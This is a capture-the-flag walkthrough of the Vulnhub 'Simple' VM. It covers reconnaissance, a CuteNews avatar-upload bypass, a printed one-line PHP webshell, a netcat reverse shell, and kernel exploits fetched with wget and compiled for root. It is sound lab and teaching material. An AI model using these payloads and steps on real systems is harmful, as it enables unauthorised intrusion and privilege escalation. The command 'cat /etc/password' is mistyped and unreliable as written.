Vulnhub: SecTalks – BNE0x03 – ‘Simple’ walkthrough

This vulnerable VM showed up on Vulnhub.com a few days ago, even though it seems to be from late 2015. Simple is made by @RobertWinkel aka 'Bull'. There is one flag to be found, and in order to do so, I needed to figure out a way to upload a reverse shell and afterwards escalate the privileges to finally get the flag. Here's how I did it.

After booting up the image, I had to find its IP-address. I usually do this by using 'netdiscover', but this time I was a bit surprised to see that the virtual machine had two IP-addresses (I never looked into why this happened, but it seems like it had two adapters for some reason). Time to 'nmap' the server, to see which ports were open:

nmap -sV 192.168.1.28 -O --allports -A

nmap result

The result was that only port 80 was open, and that the server was running Ubuntu Linux with Apache 2.4.7 as the webserver. After a quick visit to the IP-address in my webbrowser, it turned out that there was a website running CuteNews version 2.0.3, which is actually the latest version of the CuteNews CMS. The website had a loginform, and also an option to register for a new useraccount. I tried out a different username/password combinations, like admin/admin, username/password and so on, but without any luck.

CuteNews

Thinking that since it was the latest version of CuteNews, it wouldn't be vulnerable, I moved on to see if there were anything of interest on the webserver by firing up 'dirb' and it found a couple of interesting directories with directory listing enabled. One of them was /uploads which was empty. This made me go back to researching a bit on CuteNews and it turned out that even though it was the latest version, its pretty old - and actually there's a bug which allows arbitrary fileuploads. Using 'searchsploit' I found out that Exploit-db had a working example on how to exploit this.

The example required that the fileupload of a new avatar from the user profile page had to be intercepted with a proxy, and the request should be modified into changing the filename from .jpg to .php. I decided to test with a normal .jpg file first, just to see if it actually ended up in the /uploads directory, which it did. Then I tried uploading my phpinfo.php file, which just contains - and this actually worked, the file ended up in the /uploads directory with a slightly different name, but when loading the script from the browser, it showed the output of phpinfo() - neat. Not sure why this worked, due to the example from exploit-db that I mentioned earlier.

phpinfo

The next step was to upload a simple webshell, this webshell just contained the following line:

<pre><?php system($_GET['c']);exit;?></pre>

This made it possible for me to do some reconnaissance of the filesystem and keyfiles, before moving on with a better reverse shell.
cat /etc/password

Kali Linux, which was my weapon of choice for this task, comes with a lot of different webshells (in /usr/share/webshells), and I decided to use the php-reverse-shell.php script to get a better shell together with netcat.

reverse shell

To activate the reverse shell, I used curl to call the URL, which resulted in getting a reverse shell through my netcat on port 4444. I'M IN! ... but only as the www-data Apache user. First things first, I always spawn a new and less limited shell using Python:

python -c 'import pty; pty.spawn("/bin/bash")'

I got the command above a long time ago, from a brilliant blogpost that g0tm1lk did on Basic Linux Privilege Escalation. If you haven't already, you really want to check that one out.

Next I spend quite some time lurking around in the /var/www/html directory, as my first guess was that I had to find the password for the 'bull' user, which is the only "real" user except root present on the server, and then escalate from there. Even though there is a MySQL-server running on the server, CuteNews doesn't use it - instead it stores everything in flat files, that includes the userdatabase. Unfortunately the passwords were encrypted, and I gave up brute forcing them after a little while - there had to be another way to escalate my privileges.

Searchsploit revealed a couple of exploits for Ubuntu 14.04:
searchsploit

I ended up finding three possible exploits, and found out that two of them worked. I downloaded them into /tmp from my local Kali Linux with wget, and compiled and ran them.

These worked: CVE-2016-1325, CVE-2015-1328.

gcc exploit.c -o pwn
./pwn

exploit

After getting root, all that was left was to go get the flag:

cat /root/flag.txt